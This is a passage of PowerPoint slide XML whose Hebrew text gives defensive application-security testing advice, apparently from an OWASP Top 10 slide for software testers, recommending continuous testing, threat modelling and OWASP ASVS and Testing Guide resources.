                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Agile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DevOps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הכניסו לחץ גדול על שיטות וכלים ישנים. לכן אנו ממליצים להכניס מחשבה לתוך הדרך בה תמקדו את ההחלטות לגבי מה חשוב לכל פורטפוליו היישומים ולבצע זאת בצורה יעילה.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>סיכונים מודרניים מתקדמים במהירות, לכן הימים של ביצוע סריקות ובדיקות חוסן אפליקטיביות אחת לשנה עברו. פיתוחי תוכנה מודרניים מחייבים בדיקות פיתוח מאובטח בצורה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שוטפת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בכל משך חיי תהליך הפיתוח. בחן כיצד להרחיב את תהליכי הפיתוח באמצעות מיכון תהליכי אבטחה אשר לא עוצרים את תהליכי הפיתוח. בכל גישה שתבחר, שקול את העלות השנתית של בדיקה, תעדוף, טיפול, בדיקה חוזרת והפצה חוזרת של יישום בודד והכפל נתון זה במספר היישומים בפורטפוליו.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Textplatzhalter 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    מה הדבר הבא עבור בודקי תוכנה</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-876300" y="3124200"/>
            <a:ext cx="8670785" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="233645" y="3150429"/>
            <a:ext cx="6480720" cy="4960107"/>
            <a:chOff x="233645" y="3150429"/>
            <a:chExt cx="6480720" cy="4960107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="233645" y="3223041"/>
              <a:ext cx="5549303" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="86400" rIns="82800" bIns="86400" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>לפני שמתחילים תהליך בדיקות, וודאו שאתם יודעים במה חשוב להשקיע את הזמן. תעדוף מגיע ממתאר האיום, כך שאם לא הגדרתם מודל עבור מתאר איום, עלכם לייצר אחד לפני שאתם מתחילים בבדיקות.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>שקלו להשתמש ב-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t> OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>ASVS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ו-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t> OWASP Testing </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>כבסיס ואל תסמכו על כלים של יצרנים להחלטה מה חשוב עבור העסק שלכם.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5784070" y="3150429"/>
              <a:ext cx="930295" cy="891759"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="233645" y="4237660"/>
              <a:ext cx="5549303" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="86400" rIns="82800" bIns="86400" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>הגישה שלכם לתהליך בדיקות פיתוח</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> מאובטח חייבת להיות מותאמת לאנשים, תהליכים וכלים אשר בשימוש בתהליך הפיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SDLC</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>). ניסיונות לכפות שלבים נוספים, נקודות ביקורת ובחינה עשויים לייצר התנגדות, ייעקפו ויקשו על גדילה תהליך הפיתוח.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>חפשו אחר הזדמנויות טבעיות לאיסוף מידע עבור אבטחה והזינו אותן מחדש לתוך התהליך.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="950" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5784070" y="4171188"/>
              <a:ext cx="930295" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="233645" y="5252278"/>
              <a:ext cx="5549303" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="86400" rIns="82800" bIns="86400" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>בחרו את הדרך הפשוטה, המהירה והמדוייקת ביותר לבדיקת כל דרישה. מסמך </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>Framework</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ו-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t> OWASP Application Security Verification </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>Standard</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> עשויים להיות מקורות מידע חשובים לדרישות אבטחה בהתליכי הבדיקה. חשבו על הגורם האנושי הנדרש להתמודד עם בעיות </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>false positive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> בשימוש בכלים ממוכנים, וכן את הסכנה החמורה ב-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>false negatives</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5784070" y="5196300"/>
              <a:ext cx="930295" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
